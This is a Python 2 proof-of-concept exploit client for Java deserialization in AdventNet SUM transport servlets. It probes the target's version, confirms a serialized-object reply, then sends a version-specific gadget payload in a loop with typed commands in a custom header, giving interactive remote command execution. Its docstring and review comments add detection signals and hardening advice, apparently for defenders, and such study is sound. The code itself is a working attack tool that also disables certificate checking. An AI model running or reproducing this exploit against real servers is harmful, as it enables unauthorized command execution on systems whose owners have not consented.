"""Python 2 proof-of-concept client for the SUM transport servlets.

Flow, as written below:
  1. GET the base URL and pull a four-digit "20xx" token out of the page.
     It is printed as the version and selects which gadget-<version>.bin
     file is read from the working directory.
  2. POST the contents of int.bin to SUMHandShakeServlet and hex-encode the
     reply. The run continues only when the reply contains "aced0005", the
     Java object serialization stream header (magic 0xACED, version 0x0005).
  3. In a prompt loop, POST the gadget file to SUMCommunicationServlet with
     each typed line placed in the "me0me0hakxor" request header, and print
     the raw response body.

What this traffic looks like from the defending side:
  * POSTs with binary bodies to
    /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet and
    /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet.
  * A non-standard request header named "me0me0hakxor" carrying free text.
  * The same request body repeated on every call to the second servlet.
Both endpoints appear to exchange serialized Java objects, so restricting
who can reach these paths and applying a deserialization allow-list (the
JDK serialization filter, JEP 290) are the relevant hardening steps. The
affected product build and the vendor fix are not identified on this page.
"""
import re
import sys

import requests

# Silences urllib3's warning about unverified HTTPS; every request below is
# sent with verify=False, so server certificates are never checked.
requests.packages.urllib3.disable_warnings()

# Optional local intercepting proxy, left commented out by the author:
# proxy = {
#     "http": "http://127.0.0.1:8080",
#     "https" : "http://127.0.0.1:8080",
# }
proxy = {}


def exploit(url):
    """Probe ``url`` and, if the handshake check passes, start the prompt loop.

    Args:
        url: Base URL of the target; the servlet paths are appended to it.

    Side effects:
        Reads int.bin and gadget-<version>.bin from the current directory,
        sends HTTP requests through one shared ``requests.Session``, prints
        to stdout and reads commands from stdin.

    Exits:
        Raises SystemExit(-1) when the handshake reply lacks the
        serialization header, and again (same status) when "quit" is typed.
    """
    http = requests.Session()
    landing = http.get(url, verify=False, proxies=proxy)

    # Version fingerprint: first whitespace-delimited 20xx token on the page.
    # NOTE(review): there is no guard for a page without such a token; the
    # .group() call then raises AttributeError.
    year_match = re.search("\s20[0-9]{2}\s", landing.text)
    version = year_match.group().strip()
    print "Version: " + version

    # Handshake body comes from a local file whose contents are not shown on
    # this page. NOTE(review): the handle is never closed.
    handshake_body = open("int.bin").read()
    handshake_url = "%s/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet" % url
    handshake_reply = http.post(
        handshake_url,
        data=handshake_body,
        verify=False,
        proxies=proxy,
    )
    reply_hex = handshake_reply.content.encode('hex')

    # The only exposure test is the presence of the Java serialization stream
    # header anywhere in the reply. The same marker in an outbound response
    # from this servlet is a usable detection signal.
    speaks_java_serialization = "aced0005" in reply_hex
    if not speaks_java_serialization:
        print "[x]: Not Vulnerability"
        raise SystemExit(-1)

    # Version-specific payload file; presumably a serialized gadget chain
    # that reads the command from the request header (file not shown here).
    payload = open("gadget-%s.bin" % version, 'rb').read()
    command_url = "%s/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet" % url

    while True:
        command = raw_input("CMD: ")
        reply = http.post(
            command_url,
            data=payload,
            headers={"me0me0hakxor": command},
            verify=False,
            proxies=proxy,
        )
        print(reply.content)
        # The request above is sent before this check, so the literal word
        # "quit" also reaches the server in the header of the last request.
        if command != "quit":
            continue
        print("Exiting ...")
        raise SystemExit(-1)


if __name__ == "__main__":
    exploit(sys.argv[1])